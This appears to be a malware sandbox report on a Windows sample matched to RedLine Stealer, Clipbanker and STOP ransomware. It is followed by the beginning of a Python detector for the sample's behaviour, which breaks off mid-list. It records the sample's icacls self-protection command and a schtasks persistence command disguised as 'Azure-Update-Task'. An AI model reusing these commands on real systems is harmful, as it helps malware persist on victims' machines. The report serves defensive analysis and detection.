Source: 00000017.00000002.1792336779.00000000044D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000013.00000002.1703479175.0000000000B3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.3283516956.0000000000AC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001E.00000002.2677244146.0000000000880000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@45/1390@9/5
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree, 2_2_00411900
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 0_2_044987C6 CreateToolhelp32Snapshot,Module32First, 0_2_044987C6
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 2_2_0040D240
Source: C:\Users\user\Desktop\R5391762lf.exe File created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: --Admin 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: IsAutoStart 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: IsTask 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: --ForNetRes 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: IsAutoStart 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: IsTask 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: --Task 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: --AutoStart 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: --Service 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: X1P 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: --Admin 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: runas 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: x2Q 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: x*P 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: C:\Windows\ 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: D:\Windows\ 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: 7P 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: %username% 2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe Command line argument: F:\ 2_2_00419F90
Source: R5391762lf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\R5391762lf.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\R5391762lf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: R5391762lf.exe String found in binary or memory: set-addPolicy
Source: R5391762lf.exe String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe String found in binary or memory: set-addPolicy
Source: R5391762lf.exe String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe String found in binary or memory: set-addPolicy
Source: R5391762lf.exe String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe String found in binary or memory: set-addPolicy
Source: R5391762lf.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\R5391762lf.exe File read: C:\Users\user\Desktop\R5391762lf.exe
Source: unknown Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
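The "Command line argument" strings and the process tree above together show the sample's staging: it relaunches itself with --Admin / --Task / --AutoStart, drops a GUID-named folder under AppData\Local and runs icacls to deny Everyone (S-1-1-0) delete rights on it, then build3.exe registers the per-minute task "Azure-Update-Task" pointing at mstsca.exe under AppData\Roaming. The following is an added example, not part of the Joe Sandbox report or of any tool it references: it parses "Process created" lines in the report's own format, flags those three behaviours, and emits the undo commands. The first five input lines are copied from the report; the sixth (a vendor installer registering a daily task from Program Files) is constructed so that a legitimate schtasks call is shown not to fire. The rule names and helper functions are assumptions of this example.

```python
"""Detection logic for the persistence and self-protection steps in the process tree.

Added example; not part of the sandbox report. Input lines are copied from the
report's "Process created" entries, plus one constructed benign line.
"""
import re
from typing import Dict, List, Optional

# Five lines copied verbatim from the report above; the last line is constructed
# (a vendor installer registering a daily task from Program Files) and must not fire.
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)',
    r'Source: C:\Users\user\Desktop\R5391762lf.exe Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask',
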